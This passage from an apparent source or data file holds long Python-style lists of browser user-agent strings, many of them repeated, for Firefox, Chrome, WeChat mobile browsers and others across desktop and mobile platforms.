'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
userAgents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
